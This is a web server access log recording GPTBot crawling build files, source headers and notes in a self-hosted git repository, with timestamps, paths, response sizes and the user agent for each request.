"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21644] [Gzip 28.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" +[17/Feb/2026:16:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9966] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9965] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" +[17/Feb/2026:16:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10817] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10818] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 10816] [Gzip 3.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 422] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 10000] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10218] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10196] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9927] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13697] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10192] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 13699] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 10193] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" [Client 74.7.227.38] [Length 1601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__pycache__/usdkrw_fetcher.cpython-312.pyc" +[17/Feb/2026:16:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" [Client 74.7.227.38] [Length 1946] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:16:13:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" [Client 74.7.227.38] [Length 29] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook/ubuntu%20%EC%84%9C%EB%B2%84%20%EA%B8%B0%EB%B3%B8%EB%AA%85%EB%A0%B9%EC%96%B4.md" +[17/Feb/2026:16:13:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11598] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11600] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10307] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10313] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11571] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10316] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11599] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:13:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/images/favicon.ico" +[17/Feb/2026:16:13:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fbuild_exe.py" [Client 74.7.227.38] [Length 26203] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build_exe.py" +[17/Feb/2026:16:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fui_main.py" [Client 74.7.227.38] [Length 44020] [Gzip 9.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/ui_main.py" +[17/Feb/2026:16:13:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/update_status.py" +[17/Feb/2026:16:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9960] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33676] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33675] [Gzip 10.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 33677] [Gzip 10.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9936] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9967] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" +[17/Feb/2026:16:13:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9958] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" +[17/Feb/2026:16:13:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 